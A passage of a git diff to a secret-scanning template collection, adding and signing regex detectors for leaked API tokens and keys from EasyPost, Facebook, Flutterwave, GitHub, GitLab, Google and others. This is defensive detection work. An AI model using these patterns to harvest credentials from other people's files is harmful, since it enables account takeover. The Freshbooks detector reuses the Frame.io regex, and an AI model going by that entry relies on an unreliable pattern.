DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-api-token.go + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-api-token.yaml + metadata: + verified: true + tags: easypost,file,token +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - EZAK(?i)[a-z0-9]{54} + +# digest: 490a00463044022004f1ebfb9f2f0ebd7428361989c6486052a7824344dcdc958d678ab6abd61642022010c132d078db8b4628c13bb47ca798450c5af0a655854fcd2231da9a8a5c8934:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/easypost/easypost-test-token.yaml b/file/keys/easypost/easypost-test-token.yaml new file mode 100644 index 0000000000..616b74b62b --- /dev/null +++ b/file/keys/easypost/easypost-test-token.yaml @@ -0,0 +1,23 @@ +id: easypost-test-token + +info: + name: Easypost Test API Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-test-api-token.go + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-test-api-token.yaml + metadata: + verified: true + tags: easypost,file,token +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - EZTK(?i)[a-z0-9]{54} + +# digest: 4a0a0047304502202205a242f36163c78f02e5793fa0ef5d707ecce2bc367cad05ce286d75e556b302210087b1d1ce6b50b243c3a28291aed68b1f5f68cf3308330443afbdcb3b87fab4a5:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/etsy-access-token.yaml b/file/keys/etsy-access-token.yaml new file mode 100644 index 0000000000..1c30e875c0 --- /dev/null +++ b/file/keys/etsy-access-token.yaml @@ -0,0 +1,23 @@ +id: etsy-access-token + +info: + name: Etsy Access Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/etsy-access-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/etsy-access-token.go + metadata: + verified: true + tags: etsy,file,token +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:etsy)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{24})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 490a0046304402206bddeb602c7e99a6f25a38d7404ca4780f008a698aeea0cfbcf865efc5686cb40220517f0a664cd7ce38fbcf5e1d8bf0da68b4858ee04d66dd6e5440332630f6e58b:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/facebook/facebook-api-token.yaml b/file/keys/facebook/facebook-api-token.yaml new file mode 100644 index 0000000000..8d7729bd37 --- /dev/null +++ b/file/keys/facebook/facebook-api-token.yaml @@ -0,0 +1,23 @@ +id: facebook-api-token + +info: + name: Facebook API Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/facebook.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/facebook.go + metadata: + verified: true + tags: facebook,file,token +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:facebook)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 4b0a004830460221008e8d958b80d8556751101ab43f9cc2e681d16c97f0f31f221d21f0fbc5adf2dd022100a59299e03799791f28ada771791a5df4db221054dbd9ef30b0338c98e413ab77:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/facebook/facebook-client-id.yaml b/file/keys/facebook/facebook-client-id.yaml index 91942db402..26b04f695a 100644 --- a/file/keys/facebook/facebook-client-id.yaml +++ b/file/keys/facebook/facebook-client-id.yaml @@ -1,11 +1,15 @@ id: facebook-client-id info: - name: Facebook Client ID + name: Facebook Client ID - Detect author: gaurang severity: info + description: Facebook client ID token was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 tags: token,file,facebook - file: - extensions: - all @@ -14,3 +18,6 @@ file: - type: regex regex: - "(?i)(facebook|fb)(.{0,20})?['\"][0-9]{13,17}['\"]" + +# Enhanced by md on 2023/05/04 +# digest: 4a0a0047304502203ee04956e38d1c90207d18c341921f34cad6a619c8675827516cc1044c385cc70221009e2ca83865dc10f0a2310c5bd7e73a82e21a9f562734e8d44475f506bb72ed8f:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/facebook/facebook-secret.yaml b/file/keys/facebook/facebook-secret.yaml index 63da7e748e..ee6c59949f 100644 --- a/file/keys/facebook/facebook-secret.yaml +++ b/file/keys/facebook/facebook-secret.yaml @@ -1,11 +1,11 @@ id: facebook-secret-key info: - name: Facebook Secret Key + name: Facebook Secret Key - Detect author: gaurang severity: low + description: Facebook secret key token was detected. tags: token,file,facebook - file: - extensions: - all @@ -14,3 +14,6 @@ file: - type: regex regex: - "(?i)(facebook|fb)(.{0,20})?(?-i)['\"][0-9a-f]{32}['\"]" + +# Enhanced by md on 2023/05/04 +# digest: 4b0a00483046022100c8f297f448fb4903d7a38171d2ebcbb1ae4cecc818f00c5042a4d50dcb216150022100d6e7270b96ebd866b3b5f9d26deb721ef4626d502aa7be161c75379de7f39de4:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/facebook/fb-access-token.yaml b/file/keys/facebook/fb-access-token.yaml index 17d9e62ca7..c390140431 100644 --- a/file/keys/facebook/fb-access-token.yaml +++ b/file/keys/facebook/fb-access-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: facebook,token,file - file: - extensions: - all @@ -19,4 +18,6 @@ file: - type: regex part: body regex: - - '\b(EAACEdEose0cBA[a-zA-Z0-9]+)\b' \ No newline at end of file + - '\b(EAACEdEose0cBA[a-zA-Z0-9]+)\b' + +# digest: 4a0a00473045022100849d707008c69218562f7bde2c69a9aa3ed82d2d9ee236d1e99a5885f885915702200fa99a785b94a0f76dd311407317707c399db097ae2a7e525ee21d6e19e14249:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/fastly-api-token.yaml b/file/keys/fastly-api-token.yaml new file mode 100644 index 0000000000..02ee17c702 --- /dev/null +++ b/file/keys/fastly-api-token.yaml @@ -0,0 +1,23 @@ +id: fastly-api-token + +info: + name: Fastly API Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/fastly-api-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/fastly-api-token.go + metadata: + verified: true + tags: fastly,file,token +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:fastly)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9=_\-]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 4b0a00483046022100f27fc62e71d8482e77e4e25580a09b047e703a671494621c10cf095998d7b81f022100b6e48bd0d839eaf27c582aadcff75b9c38788f59dd9df6f5771542195ccc61cc:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/fcm-api-key.yaml b/file/keys/fcm-api-key.yaml index 382f9e8c0f..9e4321c76a 100644 --- a/file/keys/fcm-api-key.yaml +++ b/file/keys/fcm-api-key.yaml @@ -5,7 +5,6 @@ info: author: Devang-Solanki severity: medium tags: token,file,fcm,firebase,google - file: - extensions: - all @@ -13,4 +12,6 @@ file: extractors: - type: regex regex: - - '[A-Za-z0-9-_]+:APA91b[A-Za-z0-9-_#]+' \ No newline at end of file + - '[A-Za-z0-9-_]+:APA91b[A-Za-z0-9-_#]+' + +# digest: 4b0a00483046022100bc7886851ceb66a835c70f4d80ac2c052733d0b5bd41d73bb7b2e15b529d3e5b022100c1e3f33f21a2869bbc70a3e425d43ea32e76d39f170458498baeae985d4b36ea:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/figma-access-token.yaml b/file/keys/figma-access-token.yaml index 76e345b661..b6c25b5ea0 100644 --- a/file/keys/figma-access-token.yaml +++ b/file/keys/figma-access-token.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: figma,file,token - file: - extensions: - all @@ -19,4 +18,6 @@ file: - type: regex part: body regex: - - (?i)figma.{0,20}\b([0-9a-f]{4}-[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\b \ No newline at end of file + - (?i)figma.{0,20}\b([0-9a-f]{4}-[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\b + +# digest: 4a0a00473045022100959481f99e4a99501cfa19ad0512b782c3c866f355409d7cceafb79540ba447402201c8e102bb5293ee0a7ad11bb79d7aac53c09f6140309adb945cbe2dd820a2692:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/finicity/finicity-api-token.yaml b/file/keys/finicity/finicity-api-token.yaml new file mode 100644 index 0000000000..340f473fc0 --- /dev/null +++ b/file/keys/finicity/finicity-api-token.yaml @@ -0,0 +1,23 @@ +id: finicity-api-token + +info: + name: Finicity API Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finicity-api-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finicity-api-token.go + metadata: + verified: true + tags: finicity,file,token +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:finicity)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 490a00463044022072f0de7bc4a7064b6806f01dc8fc93301bde177f1bd3d48109bb640c52068f0d0220047668090e86e0447d6303dfd7c3f60d7302ed0a0eaf53b0d3d5a49d9acca3b6:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/finicity/finicity-client-secret.yaml b/file/keys/finicity/finicity-client-secret.yaml new file mode 100644 index 0000000000..db35247705 --- /dev/null +++ b/file/keys/finicity/finicity-client-secret.yaml @@ -0,0 +1,23 @@ +id: finicity-client-secret + +info: + name: Finicity Client Secret + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finicity-client-secret.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finicity-client-secret.go + metadata: + verified: true + tags: finicity,file,token +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:finicity)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{20})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 4a0a0047304502207995313246c87493406cae27e32b391f55823f7fe256d413108bceaf0c6c626e022100c4c7130bcee32f2167cf7b6864086bd95005492e9551b7d1925911460acb1797:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/finnhub-access-token.yaml b/file/keys/finnhub-access-token.yaml new file mode 100644 index 0000000000..e6e22a65fa --- /dev/null +++ b/file/keys/finnhub-access-token.yaml @@ -0,0 +1,23 @@ +id: finnhub-access-token + +info: + name: Finnhub Access Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finnhub-access-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finnhub-access-token.go + metadata: + verified: true + tags: finnhub,file,token +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:finnhub)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{20})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 4b0a00483046022100ad7c61a1139d67baab95841d44720de20e82de74a2714ad84291fec365850a830221009091fe9126faf7e1c4cd4f17d8f3593271077e0cfcf66ce5f2e09a4cdd36de5f:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/firebase-database.yaml b/file/keys/firebase-database.yaml index b02e6e2190..5add03dc6c 100644 --- a/file/keys/firebase-database.yaml +++ b/file/keys/firebase-database.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: info tags: token,file,firebase - file: - extensions: - all @@ -15,3 +14,5 @@ file: regex: - "[a-z0-9.-]+\\.firebaseio\\.com" - "[a-z0-9.-]+\\.firebaseapp\\.com" + +# digest: 4a0a00473045022045b4bad54ca404668062e69a5cbe19abc2d2828e152813e9ed6dc2275b4abacd022100a7f091ccbfc19687a6c7038ba1b849258840d2415623b26fe5642939cf004726:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/flickr-access-token.yaml b/file/keys/flickr-access-token.yaml new file mode 100644 index 0000000000..d734cf972a --- /dev/null +++ b/file/keys/flickr-access-token.yaml @@ -0,0 +1,23 @@ +id: flickr-access-token + +info: + name: Flickr Access Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flickr-access-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flickr-access-token.go + metadata: + verified: true + tags: flickr,file,keys +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:flickr)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 4a0a00473045022100e34de1ee37b96835acda1132433eec7c4b02c2a35b1139ae4b8e5aaa38e85e5e0220612e97d89129b040693343da576a8d7eee35944a3769c76dd269f5602e0d02db:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/flutter/flutterwave-encryption-key.yaml b/file/keys/flutter/flutterwave-encryption-key.yaml new file mode 100644 index 0000000000..8d0c8d273e --- /dev/null +++ b/file/keys/flutter/flutterwave-encryption-key.yaml @@ -0,0 +1,23 @@ +id: flutterwave-encryption-key + +info: + name: Flutterwave Encryption Key + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-encryption-key.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-encryption-key.go + metadata: + verified: true + tags: flutter,file,keys,flutterwave +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - FLWSECK_TEST-(?i)[a-h0-9]{12} + +# digest: 490a00463044022001bb728280f64a65aad5cf17534d751dbe1cda89c68bb06251a2232fe7ca0810022037d2fb62e03bd86162102d5d381a0c5a6c54728628a5381af1eeaac926773f91:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/flutter/flutterwave-public-key.yaml b/file/keys/flutter/flutterwave-public-key.yaml new file mode 100644 index 0000000000..917c090fe6 --- /dev/null +++ b/file/keys/flutter/flutterwave-public-key.yaml @@ -0,0 +1,23 @@ +id: flutterwave-public-key + +info: + name: Flutterwave Public Key + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-public-key.go + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-public-key.yaml + metadata: + verified: true + tags: flutter,file,keys,flutterwave +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - FLWPUBK_TEST-(?i)[a-h0-9]{32}-X + +# digest: 4a0a0047304502201663f48cdd3af7e4e844c938a840b398231226cf267ce2b9b71aee64b4f01b070221009b15d106d4003dba20c9c1de1a7531478ba5abe063299fa31fad81343c1b8e07:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/flutter/flutterwave-secret-key.yaml b/file/keys/flutter/flutterwave-secret-key.yaml new file mode 100644 index 0000000000..cfbd727556 --- /dev/null +++ b/file/keys/flutter/flutterwave-secret-key.yaml @@ -0,0 +1,23 @@ +id: flutterwave-secret-key + +info: + name: Flutterwave Secret Key + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-secret-key.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-secret-key.go + metadata: + verified: true + tags: flutter,file,keys,flutterwave +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - FLWSECK_TEST-(?i)[a-h0-9]{32}-X + +# digest: 4a0a00473045022100ef800d5ff9a0070b05c95c26fea14222a4efb0739951eea468e07f08ccef665a022008c000020cb1a4316a03521c4fd6d3af85de85340d924cff0d0936b80b1ed85f:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/frameio-api-token.yaml b/file/keys/frameio-api-token.yaml new file mode 100644 index 0000000000..2ec16d8a41 --- /dev/null +++ b/file/keys/frameio-api-token.yaml @@ -0,0 +1,23 @@ +id: frameio-api-token + +info: + name: Frameio API Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/frameio-api-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/frameio-api-token.go + metadata: + verified: true + tags: frameio,file,keys +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - fio-u-(?i)[a-z0-9\-_=]{64} + +# digest: 4a0a0047304502200c5a4dfba3c1a826c28c745bd3debafd32fa105a12cd37a5c018300440233ad8022100836571fe9c99297bbbcd639faaac0f0b856d4a6049e8fcc201537c5068d7ac57:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/freshbooks-access-token.yaml b/file/keys/freshbooks-access-token.yaml new file mode 100644 index 0000000000..4998e53bbb --- /dev/null +++ b/file/keys/freshbooks-access-token.yaml @@ -0,0 +1,23 @@ +id: freshbooks-access-token + +info: + name: Freshbooks Access Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/freshbooks-access-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/freshbooks-access-token.go + metadata: + verified: true + tags: freshbooks,file,keys +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - fio-u-(?i)[a-z0-9\-_=]{64} + +# digest: 490a004630440220373919559ed5f79b42f4628fe2e75f9de9582f7447fdd43a711fe32f13993ece02207d990413ca61229e70e14b9d17990afbec9396475b33ba44faf734c9e4e27c16:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/gcp-service-account.yaml b/file/keys/gcp-service-account.yaml index 9dd972a00f..bbf46ef2a0 100644 --- a/file/keys/gcp-service-account.yaml +++ b/file/keys/gcp-service-account.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: low tags: token,file,google - file: - extensions: - all @@ -14,3 +13,5 @@ file: - type: regex regex: - "\"type\": \"service_account\"" + +# digest: 490a004630440220046bd228e09ca2c9b59a98b7879e1f618b20aa617cd1c3980400c3fce47cccf1022040771aefcef34bb2b46fd5cd4700e5f4a43469eedb4a2159600ff610f04a1fb8:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/github/github-app-token.yaml b/file/keys/github/github-app-token.yaml index f8b16c189c..e4e0e08028 100644 --- a/file/keys/github/github-app-token.yaml +++ b/file/keys/github/github-app-token.yaml @@ -5,7 +5,6 @@ info: author: tanq16,DhiyaneshDK severity: medium tags: token,file,github - file: - extensions: - all @@ -14,3 +13,5 @@ file: - type: regex regex: - "\b((?:ghu|ghs)_[a-zA-Z0-9]{36})\b" + +# digest: 4a0a0047304502210091c33ab663528c463db06b2ed0d6e02d7de295128431b9848f4f3c052877d1e202206c82b7ce425e239c63415d9d6934ae8c67b70fdf994cbea66675df719bfc73aa:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/github/github-oauth-token.yaml b/file/keys/github/github-oauth-token.yaml index c1c5eae2d5..a72ffb90f3 100644 --- a/file/keys/github/github-oauth-token.yaml +++ b/file/keys/github/github-oauth-token.yaml @@ -5,7 +5,6 @@ info: author: tanq16 severity: high tags: token,file,github - file: - extensions: - all @@ -14,3 +13,5 @@ file: - type: regex regex: - "gho_.{36}" + +# digest: 4a0a004730450221009bde3b698c1b46ff528e863a0c0dea9217726d5638d9b49eebe8628dd89daa3b0220698945f1fb556e235bd85d75c03ee467776cd9651ffff8d34c79dffc75a91227:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/github/github-outdated-key.yaml b/file/keys/github/github-outdated-key.yaml index 596281159b..105e18d691 100644 --- a/file/keys/github/github-outdated-key.yaml +++ b/file/keys/github/github-outdated-key.yaml @@ -12,7 +12,6 @@ info: metadata: verified: true tags: file,github,ssh,rsa - file: - extensions: - all @@ -22,3 +21,5 @@ file: regex: - SHA256:nThbg6kXUpJWGl7E1IGOCspRomTxdCARLviKw6E5SY8 - ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAq2A7hRGmdnm9tUDbO9IDSwBK6TbQa\+PXYPCPy6rbTrTtw7PHkccKrpp0yVhp5HdEIcKr6pLlVDBfOLX9QUsyCOV0wzfjIJNlGEYsdlLJizHhbn2mUjvSAHQqZETYP81eFzLQNnPHt4EVVUh7VfDESU84KezmD5QlWpXLmvU31/yMf\+Se8xhHTvKSCZIFImWwoG6mbUoWf9nzpIoaSjB\+weqqUUmpaaasXVal72J\+UX2B\+2RPW3RcT0eOzQgqlJL3RKrTJvdsjE3JEAvGq3lGHSZXy28G3skua2SmVi/w4yCE6gbODqnTWlg7\+wC604ydGXA8VJiS5ap43JXiUFFAaQ== + +# digest: 4b0a004830460221008a1deb001a20200a58af862b4cf49f914b4e8e1d6ea0409e6c955e120f66114b0221009528c1268ac75d6c688740ea03ae9b8f84379aad386cce009e624a8e55b19166:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/github/github-personal-token.yaml b/file/keys/github/github-personal-token.yaml index 7982d00ae7..869cf6356d 100644 --- a/file/keys/github/github-personal-token.yaml +++ b/file/keys/github/github-personal-token.yaml @@ -5,7 +5,6 @@ info: author: geeknik severity: high tags: token,file,github - file: - extensions: - all @@ -15,3 +14,5 @@ file: regex: - "ghp_.{36}" - "github_pat_.{82}" + +# digest: 4a0a00473045022100e080d843c580806912ae8ef53bcc31a18d8fc5ba1fc008cbbe9b474d404fee3e02206ae7b2e3732639f7276d13a40c4b6ae4efd9a68153c9157e063225ad8a104845:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/github/github-refresh-token.yaml b/file/keys/github/github-refresh-token.yaml index 15b1684157..ce7e551099 100644 --- a/file/keys/github/github-refresh-token.yaml +++ b/file/keys/github/github-refresh-token.yaml @@ -5,7 +5,6 @@ info: author: tanq16 severity: high tags: token,file,github - file: - extensions: - all @@ -14,3 +13,5 @@ file: - type: regex regex: - "ghr_.{76}" + +# digest: 4b0a00483046022100b45f1e98e6e02636fdcc86fd498c53770ead2737d31c72b491e8aecfb9ce66ce02210092b676b9fac981ee08a69d9bcfcf35873b3400f305059e6d8a393848bb22d9fe:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/gitlab/gitlab-personal-accesstoken.yaml b/file/keys/gitlab/gitlab-personal-accesstoken.yaml index 00774772f5..4c9995d9b3 100644 --- a/file/keys/gitlab/gitlab-personal-accesstoken.yaml +++ b/file/keys/gitlab/gitlab-personal-accesstoken.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: gitlab,token,file - file: - extensions: - all @@ -19,4 +18,6 @@ file: - type: regex part: body regex: - - '\b(glpat-[0-9a-zA-Z_-]{20})(?:\b|$)' \ No newline at end of file + - '\b(glpat-[0-9a-zA-Z_-]{20})(?:\b|$)' + +# digest: 490a004630440220051de1fb56bb188a6df6ca5a2631e83b24c0e199aa8aab6ba1db1fb42b64a1720220523d7edfb267b04cb376a7bff0d6ee3d9557908323aababb0385f98a0df70ccc:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/gitlab/gitlab-pipeline-triggertoken.yaml b/file/keys/gitlab/gitlab-pipeline-triggertoken.yaml index 19131d15fb..92ee6b04ae 100644 --- a/file/keys/gitlab/gitlab-pipeline-triggertoken.yaml +++ b/file/keys/gitlab/gitlab-pipeline-triggertoken.yaml @@ -12,7 +12,6 @@ info: metadata: verified: true tags: gitlab,token,file - file: - extensions: - all @@ -21,4 +20,6 @@ file: - type: regex part: body regex: - - '\b(glptt-[0-9a-f]{40})\b' \ No newline at end of file + - '\b(glptt-[0-9a-f]{40})\b' + +# digest: 4a0a00473045022100d8737ca7d76b2fc567d06d03eaf61b21797a9915b7646d03a58bab8623bacbe1022015f609dfe7221057d8d7605dd6d477059b5ce58d950b1beaa4c5a487b893a76c:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/gitlab/gitlab-runner-regtoken.yaml b/file/keys/gitlab/gitlab-runner-regtoken.yaml index c811c2c530..b4aaa953a8 100644 --- a/file/keys/gitlab/gitlab-runner-regtoken.yaml +++ b/file/keys/gitlab/gitlab-runner-regtoken.yaml @@ -12,7 +12,6 @@ info: metadata: verified: true tags: gitlab,runner,token,file - file: - extensions: - all @@ -21,4 +20,6 @@ file: - type: regex part: body regex: - - '\b(GR1348941[0-9a-zA-Z_-]{20})(?:\b|$)' \ No newline at end of file + - '\b(GR1348941[0-9a-zA-Z_-]{20})(?:\b|$)' + +# digest: 4a0a004730450221009d326b143f1b094041e163df6251a204835961a6069aaf8ac753b0c17892a046022078cb6a4036fb1416e5f3edec7d4a3dc6e0ac89dd1ad54424b9f1f85a0ec2410c:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/gitter-access-token.yaml b/file/keys/gitter-access-token.yaml new file mode 100644 index 0000000000..49bfefc520 --- /dev/null +++ b/file/keys/gitter-access-token.yaml @@ -0,0 +1,23 @@ +id: gitter-access-token + +info: + name: Gitter Access Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/gitter-access-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/gitter-access-token.go + metadata: + verified: true + tags: gitter,file,keys +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:gitter)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9_-]{40})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 4a0a00473045022024b31fc9eb1fabba2e0853bff3057754737098dce170f37dae5b48e451e37adf022100cadc0986bb67a10f42b716e69921383c00f6e61fdc87f2bfded8780288c024c5:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/gocardless-api-token.yaml b/file/keys/gocardless-api-token.yaml new file mode 100644 index 0000000000..742a0fb096 --- /dev/null +++ b/file/keys/gocardless-api-token.yaml @@ -0,0 +1,23 @@ +id: gocardless-api-token + +info: + name: Gocardless API Token + author: DhiyaneshDK + severity: info + reference: + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/gocardless-api-token.yaml + - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/gocardless-api-token.go + metadata: + verified: true + tags: gocardless,file,keys +file: + - extensions: + - all + + extractors: + - type: regex + part: body + regex: + - (?i)(?:gocardless)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}(live_(?i)[a-z0-9\-_=]{40})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 490a004630440220155e107b0ad06304b29f2c77174e43f1a746c7a1919c6db1b92f8cdfdd9fde4702203b452239f0686864410852dc04f7f1f2ab9605ce5fd6f625f2f2a92d5c4bfe64:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/google/google-api.yaml b/file/keys/google/google-api.yaml index 1242ce0367..a9ecc5e465 100644 --- a/file/keys/google/google-api.yaml +++ b/file/keys/google/google-api.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: info tags: token,file,google - file: - extensions: - all @@ -14,3 +13,5 @@ file: - type: regex regex: - "AIza[0-9A-Za-z\\-_]{35}" + +# digest: 4a0a00473045022100d4eba7b0bbc16197a7abcd64c4984de85041967f2e79373da78c9f378a74a73c02207be725903a2ee86cc856339e809ab4741494141c6f68c64bbbfd310adceaa446:922c64590222798bb761d5b6d8e72950 diff --git a/file/keys/google/google-clientid.yaml b/file/keys/google/google-clientid.yaml index 695e9af067..3f18e6ac6f 100644 --- a/file/keys/google/google-clientid.yaml +++ b/file/keys/google/google-clientid.yaml @@ -9,7 +9,6 @@ info: metadata: verified: true tags: google,token,file - file: - extensions: - all @@ -18,4 +17,6 @@ file: - type: regex part: body regex: - - '(?i)\b([0-9]+-[a-z0-9_]{32})\.apps\.googleusercontent\.com' \ No newline at end of file + - '(?i)\b([0-9]+-[a-z0-9_]{32})\.apps\.googleusercontent\.com' + +# digest: 